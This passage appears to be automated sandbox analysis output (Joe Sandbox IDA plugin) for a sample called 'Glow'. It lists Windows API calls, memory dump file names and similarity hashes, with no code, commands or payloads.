                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                          • String ID: `5E$h5E
                                                                                                                                                                          • API String ID: 1385522511-527239140
                                                                                                                                                                          • Opcode ID: 2b3091601c142c302427ea0cb31942e32371f51e17410f5dc756cb4b23ff2c6f
                                                                                                                                                                          • Instruction ID: 94f16654f0c4189ce8d5fcc50bac300791d0739baeac8aa2898017966f4c7a51
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b3091601c142c302427ea0cb31942e32371f51e17410f5dc756cb4b23ff2c6f
                                                                                                                                                                          • Instruction Fuzzy Hash: DEE0803550451CEFCB17DF1CD8459983354E7063B3B115175E511CB393F7245A42D69C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003F39F0
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 003F3A05
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                          • String ID: aut
                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                          • Opcode ID: edcb844155f57db295e787e9e12320859c72aa86885ac78559d74fac9a606b01
                                                                                                                                                                          • Instruction ID: c480cd6385fac2bece4940a72c8131de1064b348ff3989f954f7b08148fc2cba
                                                                                                                                                                          • Opcode Fuzzy Hash: edcb844155f57db295e787e9e12320859c72aa86885ac78559d74fac9a606b01
                                                                                                                                                                          • Instruction Fuzzy Hash: 59D05EB290032867DA20A764DC0EFCB7B6CDB44710F0002E1BA65A2091DBF4DA85CBD4
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00412E08
                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 00412E0F
                                                                                                                                                                            • Part of subcall function 003EF292: Sleep.KERNEL32 ref: 003EF30A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                          • Opcode ID: ea5937eeb281d4732304365b246edd207f2be981beff2b830d93ddb49e62f8ea
                                                                                                                                                                          • Instruction ID: 9610a35e57ff96c4a63a1f6bceebb7666d000dfac6d5ece085038483be0b5718
                                                                                                                                                                          • Opcode Fuzzy Hash: ea5937eeb281d4732304365b246edd207f2be981beff2b830d93ddb49e62f8ea
                                                                                                                                                                          • Instruction Fuzzy Hash: AAD0C9757C53107AF668A770AC0BFD66B549B54B10F6088357345AA1D4CAE46801C698
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00412DC8
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00412DDB
                                                                                                                                                                            • Part of subcall function 003EF292: Sleep.KERNEL32 ref: 003EF30A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                          • Opcode ID: 5bb2fce71329359942660334d0649de86fc7893d82101a334338e2e210146458
                                                                                                                                                                          • Instruction ID: ceca69b79a09b6409abe8f2a2f514f19a08ca5ddf466098972175c4d211361b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb2fce71329359942660334d0649de86fc7893d82101a334338e2e210146458
                                                                                                                                                                          • Instruction Fuzzy Hash: E1D012797D5310BBF668B770AC0FFD67B549F50B10F6088357349AA1D4CAE46801C698
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 003BC213
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 003BC221
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003BC27C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                          • Opcode ID: faf6c022dceea3866098ec51c1b3ede3805c86e26f0a6edbb0f16d24de5efc43
                                                                                                                                                                          • Instruction ID: 3da779ddfe0b3d1039a73930bd1daa8c84c63b0eae11c97567e61db08de45382
                                                                                                                                                                          • Opcode Fuzzy Hash: faf6c022dceea3866098ec51c1b3ede3805c86e26f0a6edbb0f16d24de5efc43
                                                                                                                                                                          • Instruction Fuzzy Hash: 4741F630610606AFDF338FE4C844AEA7BA5EF15714F265569FE55AF5A1DB308D00C760